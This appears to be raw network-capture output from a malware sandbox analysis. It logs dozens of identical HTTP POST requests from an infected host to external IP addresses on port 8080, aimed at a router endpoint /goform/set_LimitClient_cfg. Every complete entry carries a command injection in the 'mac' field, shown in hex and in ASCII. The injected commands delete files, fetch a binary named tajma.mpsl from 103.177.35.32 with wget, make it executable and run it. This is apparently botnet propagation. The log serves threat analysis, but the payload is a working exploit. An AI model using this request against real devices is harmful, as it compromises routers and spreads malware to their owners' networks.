                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2440192.168.2.2338492210.219.243.458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484251022 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2441192.168.2.234963481.134.199.358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484281063 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2442192.168.2.2357412134.80.137.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484483004 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2443192.168.2.2358250182.14.185.2258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484571934 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2444192.168.2.2346144164.179.24.2158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484571934 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2445192.168.2.2346554198.136.123.558080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484617949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2446192.168.2.234852245.164.5.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484635115 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2447192.168.2.2348830198.102.113.858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484647989 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2448192.168.2.2341626178.164.62.1228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484663963 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2449192.168.2.2353916220.64.134.1518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484690905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2450192.168.2.234320432.50.24.2008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484710932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2451192.168.2.235806223.231.165.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484734058 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2452192.168.2.2344440201.143.236.1978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484735966 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2453192.168.2.234118678.18.149.1878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484759092 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2454192.168.2.233464261.203.241.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484770060 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2455192.168.2.2333288106.179.121.848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484786987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2456192.168.2.235113287.84.10.2318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484819889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2457192.168.2.2343560212.55.196.238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484850883 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2458192.168.2.234035898.35.54.1788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484853983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2459192.168.2.234043476.45.156.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484865904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2460192.168.2.2341028149.162.192.2428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484925032 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2461192.168.2.2336250200.15.126.348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.484955072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2462192.168.2.2352046176.101.7.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.485048056 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
